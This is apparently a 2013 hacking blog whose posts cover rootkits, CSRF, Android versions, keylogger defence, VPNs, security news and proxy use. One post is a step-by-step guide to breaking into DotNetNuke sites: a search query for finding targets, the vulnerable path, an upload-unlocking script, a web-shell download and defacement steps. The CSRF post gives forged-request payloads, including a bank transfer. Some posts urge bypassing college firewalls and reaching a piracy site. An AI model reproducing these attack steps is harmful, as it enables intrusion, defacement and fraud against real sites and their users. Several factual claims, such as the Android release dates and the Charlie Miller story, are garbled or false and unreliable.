Sunday, 24 March 2013

A thing called Rootkit

There are some concepts in the hacking world which leaves the passers-by absolutely stunned. It appears something like a magic portion creating a black magic effect. By passers-by I mean those who try out its implementation for the first time.

Its installation is usually simple but its output is absolutely amazing. It gives you the power to hide processes, programs and files so that the users cannot spot them and even the OS fails to spot them!!!

And if the OS fails to spot them what can the antivirus do???

YES I AM TALKING ABOUT ROOTKITS.

Rootkits have the power to evade highly sophisticated antivirus softwares.

ROOTKIT = ROOT + KIT

ROOT  =         Root-level Access or Administrative Access
KIT      =                     Set of Tools

Rootkits are used for many purposes including (but not limited to) the following:

1.Privilege Escalation
2.Backdoor Installation
3.Recording Keystrokes
The primary reason why rootkits evade detection is because they operate at a lower level of the OS i.e. inside the kernel.When we use any software i.e. when we interact with it,these interactions happen at a higher level of the OS.

When an anti virus does its job I mean scanning,it usually passes requests off to the inner levels of the OS for the completion of its task.

Now we know that rootkits dwell deep inside the OS.This is where a rootkit does its job by intercepting system calls between any software and the OS.In the Hacking world this action of Rootkit is known as Hooking.

For instance lets go through an example :

To find out the running processes on a Windows computer we use Ctrl + Alt + Del.
This starts the Task Manager and on clicking the Processes Tab we see all the processes which are running at the moment.

In the above case the OS is called and asked “Which processes/services are running now?”

The OS here starts querying all the running processes “it knows”(Yes this is the catch.Hope you got it!!!)

Now if we bring rootkit here in between they give us the ability to intercept and modify the responses which the OS returns when the user asks for it.

When the user asks for the listing of all the running processes the rootkit intercepts this and removes selected processes from that list and displays the modified list to the users.

All this happens so fast that the user can never even think that a rootkit is installed on his/her machine.

Keep yourself hooked to Innobuzz Blog and be on the lookout for future articles on how to use a full-fledged rootkit.

For Any Query Leave A Comment Or Contact Me On Facebook
Contact ==> www.facebook.com/ryan.manjothi
Posted by Ry4n h4x0r 0 comments
Read More

CSRF (Cross Site Request Forgery)

CSRF stands for Cross Site Request Forgery. It is a method used by an attacker to trick a user into loading a page that contains a malicious request written in the form of codes. This type of attack can be preformed to change a user’s email id, password, name or any other field or even make a purchase in some typical cases. There is no way any site can differentiate between pure request and forged request because this attack is performed when the victim is logged on and the victim clicks on some areas which have been manipulated by the attacker. The malicious script gets executed away from the user vicinity from un-trusted source, which is uploaded by the hacker. This type of attack can lead to leak of many sensitive data stored in the server like Credit Card Details or Bank Details.

These are the HTML methods that can be used for performing this type of attack:
IMG SRC
  <img src="http://www.vulnerable.com/?command">

SCRIPT SRC
  <script src="http:// www.vulnerable.com /?command">

IFRAME SRC
  <iframe src="http:// www.vulnerable.com /?command">

Javascripts can also be used in the following manner:

<script>
var fool = new Image();
fool.src = "http://www.vulnerable.com/?command";
</script>



Example:
<iframe src="https://bank.com/apps/Fund_transfer?amt=1500&DstnAcc=143554659" >

The above link is placed in the vicinity of the victim by the attacker. When the victim clicks on the particular link, a mount of 1500 is automatically transferred from the victim’s account without even his knowledge to the given destination account number. This type of attack largely occurs on sites that depend and blindly believe the web browser session if the user. So, even if a user somehow gets into the session of another user (victim), the attacker can do anything he wants from there. So, these types of attacks are very dangerous. And, if the inserted malicious code gets stored in the server, then this attack becomes even more dangerous because every time the victim somehow runs the code, the attack keeps on going.

Even, the Youtube site has been reported against this type of vulnerability.
Posted by Ry4n h4x0r 0 comments
Read More

Google's Android

Google android suddenly has a sense that it named all its versions on the names of desserts, same as the intel names all their CPU on the names of rivers. Also they are giving the names according to English dictionary, all the names are in alphabetical order. To celebrate the release of new version launched, android delivers the dessert that matches wth the version name in whole google campus.

Version 1.1(noname)
There was no name assigned to the first version of google android. They launched it in July 2005.  HTC was the first phone making company to take the android out in market.
Android 1.5 (cupcake)
Technically android 1.5 cupcake was not the first version of google android, but the ver1.1 was not given any name so it was considered the first one. Earlier google decided to release ver1.2 but later they realized that they should majorly rvised it and then launched ver1.5 and named it cupcake. Like this the dessert series started.
Android 1.6 (donut)
Android’s third version donut was launched in Sept 2009. It fixed the reboot problem as well as consisted better search integration.
Android 2.0/2.1(�clair)
Android 2.0 was launched in Oct 2009 with a bigger version 2.0.1 in Dec 2009. Android 2.1 was released in Jan 2010 but many considered them all released together. Bluetooth 2.1, digital zoom, multi-touch and live wallpapers were the new features added to this version.
Android2.2(Froyo)
Android 2.2 froyo mainly improved the speed by introducing the java script.
Android 2.3 (gingerbread)
Gingerbread man was introduced in google campus in  Nov 2010 but gingerbread was released in Dec 2010. On Dec 7th of 2010, google announced the launching of Galaxy nexus S. Gingerbread supports internet calling, NFC wireless transaction capacity, support more than one camera, supports motion sensor and gravity senser.


Android 3.0 (honeycomb)
Android 3.0 honeycomb was released in Feb 2011, followed by 3.1 and 3.2 honeycomb in Aug 2011. Motorola XOOM was the first tablet to launch the 3.x version of android which was followed by many tablets in market.
Android 4.0 (ice-cream sandwich)
The latest version of android is Ice-Cream sandwich which is released in Nov 2011. All details about this version of android are provided by my in past in my earlier post.

Credits: android.com, google.com

 For Any Query Leave A Comment Or Contact Me On Facebook
Contact ==> www.facebook.com/ryan.manjothi
Posted by Ry4n h4x0r 0 comments
Read More

Long sized fb profile picture

Your facebook profile picture is the first iompression on the visitor of tour profile. All of us wants to set a stylish and attractive DP on our fb profile. Here I tell you a trick by which you can add a long sized DP.


1.  First of all, visit ths link http://profilepicturemaker.com/long-height-facebook-profile-picture-maker.j
sp

2.    Then click on LOAD PHOTO button if you have a photo on your PC otherwise click on USE WEBCAM.
3.    Now edit and configure the photo as you want.
4.    Click on login to fb button.
5.    Give your user id and login password.
6.    Now your edited image will be set as your profile picture.


  For Any Query Leave A Comment Or Contact Me On Facebook
Contact ==> www.facebook.com/ryan.manjothi
Posted by Ry4n h4x0r 0 comments
Read More

Protect yourself against keylogger

All of us are aware of keyloggers. The people who still don’t know what keylogger is, let me tell them that it is a software installed in some computer system that keep tracks of key stroked made by the user. Hackers use these software’s to record the keystrokes of victim when victim types his password. Here I am telling you guys how to protect yourself from being a victim of keylogger.
 
Enable a firewall:
Firewall donot stops the keylogger software to enter your system but it stops keylogger to send your information.
It is always strictly recommended that firewall is enabled on your system.

Use good anti-virus, avoid cracked or pirated softwares:
Use good anti-virus software like McAfee, Norton, Quick Heal, also you can go with free ones like Avast and AVG. They help you to protect yourself from keyloggers.
Please avoid downloading cracked anti-viruses from Torrentz because it’s home of viruses and hackers, also it’s illegal to pirate a software.
 
How to fool the keylogger:
These were the tips to stop keyloggers to enter your computer, now I will tell you some tips that how to fool a keylogger.

1. If you doubt that the system you are using have a keylogger installed then you can use onscreen keyboard to fool the software. To use onscreen keyboard simply type osk in run.

2. Keylogger runs in the background .Always check out for suspicious processes using task manger and end them.

3.Type two-three random characters in your password field and then use mouse to select them all, then start typing your real password. This will give some extra characters with password to the hacker. Eg: if your password is “asdfgh”, then you should type “wrogb” and select them all and then type your real password. So like this “asdfgh” will be sent to computer but “wrognasdfgh” will be sent to keylogger.

4. Also you can sniff a keyloggers ftp password using a sniffer software, some sniffers are named as wireshark and cain&able.


For Any Query Leave A Comment Or Contact Me On Facebook
Contact ==> www.facebook.com/ryan.manjothi
Posted by Ry4n h4x0r 0 comments
Read More

DotNetNuke attack- Hack a website

You guys must be aware of Portal attack for hacking a website. Portal hacking A.K.A. DotNetNuke(DNN) attack.
So here it is, let’s start:


1.   Open google.com and type”inurl:fcklinkgallery.aspx” (this is for searching sites which are vulnarable to this attack.
2.   Now select any website from the list.
3.      Now add  ”/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx” after the name of your website in url bar.
4.     You will get a link gallery page
5.     Select “file”
6.     Now copy this javascript in url bar.
javascript:__doPostBack('ctlURL$cmdUpload','')
7.    Now you will see an upload option. Clck on that and upload your shell ASp
You can download it from here http://www.ziddu.com/download/15017245/ASpShell.rar.html
8.      After upload 
go for your shell www.yoursite.com/portals/0/yourshellname.asp;.jpg
EXample : http://ww.itservi wcespro.net/portals/0/umer.asp;.jpg
9.      Now shell is in frot of you like this (screen shot)
10.  Click again and again on <Dir>, untill you find admin.
11.  When you see this page admin area, click on upload and upload your deface index page to be shown.
Posted by Ry4n h4x0r 0 comments
Read More

Iphone Exploited with Metasploit 

They can mock at Android's security loop holes or the slow and sleepy Symbian ,but they were unaware that one day the tables get turned. The leading consumer electronics giant, Apple is affected by a major flaw in its security. The flaw is termed as code signing flaw.
Metasploit, an important framework for security auditing is used in this hack.
Metasploit is used to inject the payload after finding vulnerabilities in a computer operating system, but no one really knew that it can also be used to bypass the security features of Apple's App store. Each App uploaded in apple app store by the developers are passed through a code signing test, where the apps are checked for malicious code or malware. But using the Metasploit framework, the apps can bypass this test, and a pure malicious unsigned-code app is published in the app store.
The hacker waits with his Metasploit terminal for the installation of the unsigned app in a remote iPhone(a innocent victim). Once installed, the app does its normal work, but backdoor's reverse handler connects to the Metasploit terminal and opens a Meterpreter shell. Meterpeter shell in Metasploit is what all Hackers want, considered as a success in hacking. Using Meterpeter shell all the features of iPhone can also be accessed by the hacker, like messages, calls, media, and can even transfer files. Hackers enjoy these privileges till the user deletes the app, and thats not gonna happen if it is a addictive game like Angry birds. 
This Major flaw was discovered by Charlie Miller, developer at Apple. He was fired immediately after they found that he was violating terms of Apple by hiding this flaw and some information, which he was not supposed to do.
Android users do reverse engineering in each app they download to check whether it is a malware or not. Now it seems iPhone users also needs to get their hands dirty. Well we really miss you Steve jobs
 
 For Any Query Leave A Comment Or Contact Me On Facebook 
Contact ==> www.facebook.com/ryan.manjothi
Posted by Ry4n h4x0r 0 comments
Read More

Surf Internet without a Trace: VPN

Surf Internet without a Trace: VPN

            VPN Stands for Virtual Private Network. It allows an user to connect secularly and remotely to any workplace (i.e. a server) to provide remote working environment to traveling persons. VPN usually uses a secure connection to connect to the workplace either directly through the Workplace VPN Network or through the Internet itself. A VPN user experiences the workplace network in a manner that is almost identical to being connected directly to the central workplace network. VPN is quite secure as it uses tunneling protocol to transmit data between its nodes so as to minimize data being intercept by the hacker. But, not only these, there are also some other features which allows the hacker to exploit the web without leaving a single trace.
            Also, if you are a College Student and you surf internet through the college Wi-Fi and your administrator have blocked chat and social networking sites. Then the easiest method to bypass Firewalls is to use either a Proxy Server or a VPN Server. But, using Proxy is least secured. You can also use many Free VPN Providers as well as Paid Providers as per your requirement and capacity.

 Some of the most famous VPN Providers are:
OpenVPN
PacketiX.NET
UltraVPN
Hotspot Shield – The most popular free VPN client
TorVPN
CyberGhost
Hide My Ass!
PureVPN
IAPS Security
ExpressVPN
ExpressVPN

  


Once the connection has been established, the remote client can communicate with the internal company systems over the Internet just as if it were a local host.



VPN Tunneling Protocols/Methodologies

Point-to-Point Tunneling Protocol (PPTP)
Point to Point Tunneling Protocol (PPTP) can also be used to tunnel a PPP session over an IP network. In this configuration the PPTP tunnel and the PPP session runs between the same two machines with the caller acting as a PNS.

    Layer Two Tunneling Protocol (L2TP)
The L2TP Protocol is used for integrating multi-protocol dial-up services into existing Internet Service Providers Point of Presence.
   Internet Protocol Security (IPsec)
IPsec uses cryptographic security measures to protect communication over Internet or the IP. IPsec supports network-level peer authentication, data origin authentication, data integrity, data confidentiality (encryption), and replay protection to provide security to the VPN Network.
 For Any Query Leave A Comment Or Contact Me On Facebook
Contact ==> www.facebook.com/ryan.manjothi

Posted by Ry4n h4x0r 0 comments
Read More

Cyber terrorism and World economy

Cybercrime is becoming more organized and established as a transnational business. High technology online skills are now available for rent to a variety of
customers, possibly including nation states, or individuals and groups that could secretly represent terrorist groups.

Terrorism Linked to Cybercrime

The proportion of cybercrime that can be directly or indirectly attributed to terrorists is difficult to determine. However, linkages do exist between terrorist groups and criminals that allow terror networks to expand internationally forexmple

1. US water plant has been credited to an unknown attacker who managed to access a SCADA controller and take over systems.According to a report at V3.co.uk, the hacker used the compromised SCADA system to turn a pump off and on again several times before causing it to fail.This happened on 8 November 2011 and has once again caused security experts to question the security of SCADA systems.


2. Moreover estimates say that up to 90% of computer software used in China is pirated, and thus open to hijack through computer viruses.
    http://www.networkworld.com/news/2011/012111-ballmer-hu-china-software-piracy.html

3.Hackers are able to disrupt e-commerce by engaging in denial of service attacks and by compromising online banking payment systems. Identity takeover can
also affect online banking, as new accounts can be taken over by identity thieves, thus raising concerns regarding the safety and soundness of financial
institutions.

4.According to Meridien Research, estimated fraud loss for the credit card industry amount to $1.5 billion annually.

5.Health care fraud includes frauds perpetrated upon government-sponsored and private health care benefit programs by insiders, the insured, and providers.

6. According to an FBI report on insurance fraud, published on its web site under “The Economic Crimes Unit” section, total insurance industry fraud is 27.6 billion annually.


However preventing, detecting, investigating, and prosecuting economic crimes must become a priority,otherwise the world could be in danger of slipping further behind the highly sophisticated criminals.

 For Any Query Leave A Comment Or Contact Me On Facebook
Contact ==> www.facebook.com/ryan.manjothi
Posted by Ry4n h4x0r 0 comments
Read More

Cloud Computing

Cloud Computing: 'If you need milk, would you buy a cow?' 

You are wondering why I used tag line ‘if you need milk, would you buy a cow?' with Cloud Computing.
For that first you have to be familiar with Cloud Computing.
Ok I’ll start with a formal definition.
“Cloud computing allows consumers and businesses to use applications without installation and access their personal files at any computer with internet access.”
It is a technology that uses the internet and central remote servers to maintain data and applications.

Why is it called Cloud Computing?
The name was inspired by the cloud symbol that is used to represent the Internet in flowcharts and diagrams.


A cloud can be private or public.
public cloud sells services to anyone on the Internet. (Currently, Amazon Web Services is the largest public cloud provider.)
private cloud is a proprietary network or a data center that supplies hosted services to a limited number of people. When a service provider uses public cloud resources to create their private cloud, the result is called a virtual private cloud. Private or public, the goal of cloud computing is to provide easy, scalable access to computing resources and IT services.
Examples of Cloud Computing:-

Email on the go- Email communication now plays a central role in most of our busy lives. That’s fine if you don’t go out much but if you travel a lot, this may cause problems. Unless you carry a mobile Wi-Fi-enabled laptop with you everywhere you go or use push email on your cell phone, having an email client sitting on your computer at home means that while out and about you risk spending time outside of the communication loop. This is one area where the cloud finds it’s most frequent and useful application.

 

Working in a virtual office- Google’s online suite of office applications is probably the best known but by no means the only solution on offer. Rather than having a system and space hogging suite of applications like a word processor, a spreadsheet creator and a presentation or publishing platform sitting on your computer, you could opt to work online instead.

 

Need extra processing power?-  Most cloud environments on offer can customize the kind of service provided to exactly suit the needs of the user. If you need more processing power from time to time, a cloud-based infrastructure, being scalable, negates the need for up-front investment in client-owned resources.


 For Any Query Leave A Comment Or Contact Me On Facebook
Contact ==> www.facebook.com/ryan.manjothi
Posted by Ry4n h4x0r 0 comments
Read More

New cyber security policies

The White House has issued an order on computer security to prevent disputes or breaches. Take an example of wiki leaks, which released hundreds of classified documents last year. Many disputes have occurred due to these kinds of attacks in the past and it is believed that the new set of policies will minimize them. The order coinciding with National Cyber security Month, replaces an outdated policy under Obama administration.

Obama said, “Our nation’s security requires classified information to be shared immediately with authorized users around the world, but also requires sophisticated and vigilant means to ensure it is shared securely.”

The order directs agencies to designate a senior official to oversee classified information sharing and safeguarding for the agency. The Pentagon and six other agencies have enshrined a number of measures, including the Pentagon’s disabling the “write” capability on most computers in the military’s secret-level classified network to prevent downloading classified data onto removable drives.

The order first reported by New York Times creates a difficult task for generals and directors of the national intelligence to detect or find and prevent leaks from government employees which is called as inside threat.

The White House notes that agencies have made “significant progress” in increasing and building up security. The Pentagon, for instance, has begun to issue smart cards with special identity credentials required to log onto the secret-level classified network. The cards allow holders access to only those portions of the network that contain information relevant to their jobs.
 For Any Query Leave A Comment Or Contact Me On Facebook
Contact ==> www.facebook.com/ryan.manjothi
Posted by Ry4n h4x0r 0 comments
Read More

Maharashtra Highway Police website Hacked

Okay, till now we saw that all nice fancy big firms and departments got bugged by elite hackers. We, Indians were under the impression that only, so called "developed countries" like USA, UK or UAE were troubled by the hackers.

But, what do hackers really need? Sources? Control over the resources? If so, what all they can get from just a local police department? Some people may feel this is just a prank or a joke. It is cold truth that Maharashtra Highway police website was hacked. The hacker is known to be a "Gray Hat Hacker". But here it is, he calls himself "Powerin10" and also known to be a member of "Bangladesh Cyber Army."


Alright, this was one incident. Again, the same Maharashtra Highway police website was hacked by a group called ZCOMPANY HACKING CREW(ZHC), mostly a Pakistani hacking troop. Their aim is to hack as many Indian websites as possible to spread their message and take Jammu & Kashmir to their possession.  

Pics:


Posted by Ry4n h4x0r 0 comments
Read More

QR Code "The Big Thing"

QR CodeThe Big Thing                  

Let’s assume you are going to speak at an event so it might be possible that after your presentation some people want to have a “Soft Copy” of your presentation.
How would to distribute your file?
> Collect the email Id of all people and send slides as an attachment.
> Or you can upload your slides on some websites like Google Docs. Am I Right?
Ok Now I will explain the third and best method- QR Code. QR is short for Quick Response (they can be read quickly by a cell phone). Yu have to do just one thing that put the QR code image in the last slide, people can scan the code with their mobile phones and the presentation file would automatically download on to their phones. No need to write URLs.
 How is it? Cool ... yah I know that



By using TagMyDoc service you can easily convert your documents and presentations in QR Code.
Just upload your file to TagMyDoc and it will automatically generate a QR Code and you can put that code in your slide so that people can easily download your file through their cell phone.
The service supports Word documents, PowerPoint presentations, PDFs and most common images formats.
You can use TagMyDoc without registration but in that case, the uploaded documents will expire after two weeks. They are also working on plug-in for Word and PowerPoint that will help you tag files from within Microsoft Office itself.

 For Any Query Leave A Comment Or Contact Me On Facebook
Contact ==> www.facebook.com/ryan.manjothi
Posted by Ry4n h4x0r 0 comments
Read More

The 2 U.S satellites were Hacked by China

The Commission’s 2011 Annual Report to Congress investigates China’s advancing space program. It says that in recent years, Two U.S. government satellites have experienced interference apparently consistent with the cyber exploitation of their control facility. The responsible party achieved all steps required to command the satellite failed to issue commands.

The National Aeronautics and Space Administration confirmed two suspicious events related to the Terra EOS satellite in 2008 and the U.S. Geological Survey confirmed two anomalous events related to the Landsat-7 satellite in 2007 and 2008.

Who is behind this:
The Commission's report site some indication of China involvement in this attack as follows:-

1. One Chinese defense analyst noted: ‘For countries that can never win a war with the United States by using the method of tanks and planes, attacking the US space system may be an irresistible and most tempting choice'

2. In August–September 2006: China used a laser to temporarily blind (or ‘‘dazzle’’) U.S. reconnaissance satellites, according to the reports.

3. Again in January 2010: China conducted a kinetic energy (also called ‘‘hit-to-kill’’) ballistic missile intercept. More difficult to execute than an anti-satellite attack, this technology has clear anti-satellite applications and ‘‘strategic implications for U.S. security interests.’’

4. Chines Military Astronautics write, attacks on space systems ‘‘generate tremors in the structure of space power of the enemy, cause it to suffer from chain effects, and finally lose, or partly lose, its combat effectiveness.’’ One tactic is ‘‘implanting computer virus and logic bombs into the enemy’s space information network so as to paralyze the enemy’s space information system.’’


The report described those events and the above writing appear consistent with authoritative Chinese military writings!

Find the report at http://www.uscc.gov/annual_report/2011/annual_report_full_11.pdf
 
 For Any Query Leave A Comment Or Contact Me On Facebook
Contact ==> www.facebook.com/ryan.manjothi
Posted by Ry4n h4x0r 0 comments
Read More

The Mega'Transition' of a Hacker


Don420




































                Shahzad Shaikha A.K.A. Don420, now in his 30’s, a Pakistani hacker revealed how he got a job at a bank by breaking into its website in 2008. He found a very different way to use his skills to make a living and assure a legitimate future job. He made a banking company bring down to its knees for appointing him a job interview, by hacking its secure website and accessing information of its customers. This was the only way he could think of for building his lifelong and legal hacking career. 

               He stated, “Hacking a government website is easy. No one there seems to have thought of security. I could do it in my sleep.”  but it was one of his hardest tasks ever. It cost him many sleepless nights to achieve his goal. During this entire process, he toughened himself to show the managing department of the bank about the flaw he discovered in their security system and being ready to offer his services to resolve the issues. He said, “The entire process took more than a month. Even after they confirmed that I had broken in, they didn't know what to do.”

              He was also worried because of the possibilities of a cybercrime case that could be filed against him by the bank. But eventually they trusted him and after some checks on him, he was appointed. Now, after 3 years, he is in-charge of bank’s website security, once what he used to love to breakthrough.

              Before being appointed by the banking company, Shaikha was a hacker who usually broke into websites, stole vital information and used to call himself an “Online Vandal”. He described himself as awkward geek who feels comfort in the shade of computers. The transition made by Shaikha from a “black-hat hacker”, one who uses his hacking skills towards criminal ends, to a “white-hat hacker”, someone who is gainfully employed as a computer security expert, is one few hackers can manage.

             This story tells us about all those very few hackers who manage to convert their talent into a legal and successful job, leaving behind dozens of them who couldn't manage it and embrace their life of crime.

For Any Query Leave A Comment Or Contact Me On Facebook
Contact ==> www.facebook.com/ryan.manjothi



Posted by Ry4n h4x0r 0 comments
Read More

Govt. to launch National Security Database



As we read previously, Indian Government was about to tie up with a community of ethical hackers to protect the country’s cyberspace. Well, we didn’t have a very detailed idea on what and when were the next steps to be taken by the government. Turns out, the government already had kept everything ready.

There was a National Security Database (NSD) which was running secretly on invitation only basis, for the past two years. The database already contains a fairly large number of hackers and developers who have intense knowledge in their fields. NSD, is a project of ISAC- Information Sharing and Analysis Center, which is a non profit organisation, working with the government for the improvement of Cyber Security in India.

The program is all set to launch on  26th November 2011 at the International Malware Conference, MalCon, in Mumbai. Companies like QuickHeal and Security compass have also given support to the database. Major Companies have also expressed their interest in hiring the professionals enrolled in the NSD program.

NSD have created categories like Reverse Engineering, Malware analysis etc. and will place the professionals, according to their area of expertise. They will collectively collaborate with the police departments and monitor every form of cyber attack which could either indicate an upcoming major terrorist attack, or a threat against someone.

This approach to indulge nation’s most skilled individuals to work against cyber crime is a unique and promising thing for our country. May India set new benchmarks in this field, and collectively we bring down cyber terrorism.
 
For Any Query Leave A Comment Or Contact Me On Facebook
Contact ==> www.facebook.com/ryan.manjothi
 
Posted by Ry4n h4x0r 0 comments
Read More

Android 4.0 Ice-Cream Sandwich

Android 4.0 ise-cream sandwich is the latest version of android. Complete package with multitasking, resizable widget, costomisable home screen and amazing user interface. It adds power to communication and sharing.

 
Home screen favourites tray:
Home screen includes a customisable favourites tray. You can drag folders, apps, and many proirity things to this tray for instant access from home screen only.
New lock screen:android
Now llock screen allows you to do many things without unlocking the screen. You can pull down notifications and use camera directly without unlocking screen. You can manage music tracks while listening to music.
Quick response for calls:
When a call arrves you can direct send a text message without unlocking the device. On incoming call screen slide control to see list of text responces, just tap on a massage and your message is sent.
Callender and visual voicemail:
To organise events and appointments, an updated callender app brings personal, school, work and social agendas. The app is redesigned to help you manage events more easier. In the phone app, a new visual voicemail features integrates incoming messages, voice transcriptions, and audio files from one or more providers. Third-party applications can integrate with the Phone app to add your own voice messages, transcriptions, and more to the visual voicemail inbox.
Camera capabilities:
After capturing special moments in your life, you can edit it and directly share it to family and friends. To take great pictures of people, face detection locates the faces in the frame and sets focus automatically. After taking a video or picture, you can quickly share it bthrough mail, text message, social networks,  bluetooth, and more, just by tapping the thumbnail in the camera controls.

 Improved text input and spell check:
The soft keyboard in Android 4.0 makes text input even faster and more accurate. Error correction and word suggestion are improved through a new set of default dictionaries and more accurate heuristics for handling cases such as double-typed characters, skipped letters, and omitted spaces. To fix misspelled words more easily, Android 4.0 adds a spell-checker that locates and underlines errors and suggests replacement words. With one tap, you can choose from multiple spelling suggestions, delete a word, or add it to the dictionary. You can even tap to see replacement suggestions for words that are spelled correctly
Powerfull Voice input:
Now with this new version you can dictate the text you want to type.  As the voice input engine enters text, it underlines dictation errors .You can tap those words to quickly replace them from a list of suggestions.

Face Unlock
Android 4.0 introduces a completely new approach to securing a device, making each person's device even more personal — Face Unlock is a new screen-lock option that lets you unlock your device with your face. It takes advantage of the device front-facing camera and state-of-the-art facial recognition technology to register a face during setup and then to recognize it again when unlocking the device. Just hold your device in front of your face to unlock, or use a backup PIN or pattern.

For Any Query Leave A Comment Or Contact Me On Facebook
Contact ==> www.facebook.com/ryan.manjothi

Posted by Ry4n h4x0r 0 comments
Read More

Operation Blackout by Anonymous


“We are Anonymous. We are Legion. We do not forgive censorship. We do not forget the denial of our free rights as human beings. To the United States government, you should’ve expected us.”

This isn’t some quote or a famous dialogue, it's the latest warning by anonymous to the US Govt. Apparently in return to the SOPA actions.
Let’s begin with the story about SOPA.
SOPA, an abbreviation for Stop Online Piracy Act, was introduced to the House of Representatives aiming to curb key features of the Internet to protect the rights of the entertainment industry. 

The PROTECT IP Act, the Senate match of SOPA, was passed earlier this year, but its execution was deferred for some time due to rising fears that it has the power to encumber the freedom of speech. While both bills say that they are trying to help the entertainment industry sell more movies and music, the effects of the bill are across-the-board and disastrous to Internet.
In the words of anonymous (as updated on the World Wide Web) “This is the most important operation in the history of Anonymous. No operation will be executed until we make sure this operation is successful. Any videos uploaded will be updates on this operation.”

The operation “BlackOut” is ACTUALLY a worldwide movement spread by one of the most known hackers group Anonymous, and there have been many proofs for the same. For example, this flyer got many shares and around 900 likes on Facebook within a few days of sharing. The Open letter by anonymous was also quite revolutionary in nature. Though the operation is totally related to Internet restrictions in USA, the observations clearly show that it contains the Rage of Anonymous against the US govt. internet policies.

As the letter said, “The United States has often been used as an example of the ideal free country. When the one nation that is known for its freedom and rights start to abuse its own people, this is when you must fight back, because others are soon to follow.
Has the U.S. government not learned from the past? Has it not seen the 2011 revolutions? Obviously the United States Government thinks they are exempt. This is not only an Anonymous collective call to action. What will a Distributed Denial of Service attack do? What's a website defacement against the corrupted powers of the government? No. This is a call for a worldwide internet and physical protest against the powers that be. Spread this message everywhere. We will not stand for this!

Now that they are trying to include masses in it, the US govt. needs to take some serious steps to make sure that this doesn’t cause another serious blow to the economy.
Watch the video for more details.

 For Any Query Leave A Comment Or Contact Me On Facebook
Contact ==> www.facebook.com/ryan.manjothi
Posted by Ry4n h4x0r 0 comments
Read More

How your IP can be threat to your comp itself

If you are using Internet, basic things you need to know
----------------------------------------------------------------
As we know over Internet, IP address is mandatory like the residential address we have in the real world. But of course, nobody can fake the real address where as IP address is damn too vulnerable to attacks. Attacks using TELNET is so famous where a hacker steals your bandwidth which makes you think your service provider is faulty. But as for now, Dynamic IP allocation is in force for most of the computers in the world. If your IP has been hacked, you can just switch off and switch on your modem back again so that your IP address will be changed and you'll get back your bandwidth. To check your IP you can visit the below mentioned website.

www.whatismyip.com  

Below is the process the hackers use to encroach your bandwidth. Encroaching bandwidth can be achieved by a process called "TELNET". In this process, one can obtain a login prompt to command line text interface to hack your modem. But now, most of the Internet Service Providers have disabled the feature of remote login using telnet due to the security threats. It possess threat on the IP address mainly. Refer to this section for more details.

               http://en.wikipedia.org/wiki/Telnet

IP scanner is a software used to find out the alive IP addresses by hackers. To do the remote login process using TELNET, there is no need of any software. You can refer to the images below. Now-a-days, Reverse Telnet is used instead of normal Telnet. Reverse Telnet, gives access to remote login from server side rather than providing the control to the host node or the "client". Check the below link for more information.

               http://en.wikipedia.org/wiki/Reverse_telnet

If you are a movie fan and are wondering why http://isohunt.com/ is not working. It is because the US government has imposed ban on the website due to some authority issue. Here is what you can do. Just go to http://www.kproxy.com or http://www.hidemyass.com then you can type the address of the website you wanna visit. Then you'll be redirected to that website. But the conventional way how a normal web browsing is, whenever you visit a website, first your IP address, MAC address are recorded in the web server which hosts the current website you are visiting. But this doesn't happen when you follow the procedures I just gave you. Here, your IP address is not revealed. Actually your identity is hidden. So, these are the above steps you've to follow to visit http://isohunt.com/ and download the torrent successfully. 
 
For Any Query Leave A Comment Or Contact Me On Facebook
Contact ==> www.facebook.com/ryan.manjothi
 
Posted by Ry4n h4x0r 0 comments
Read More
Subscribe to: Posts (Atom)

Pages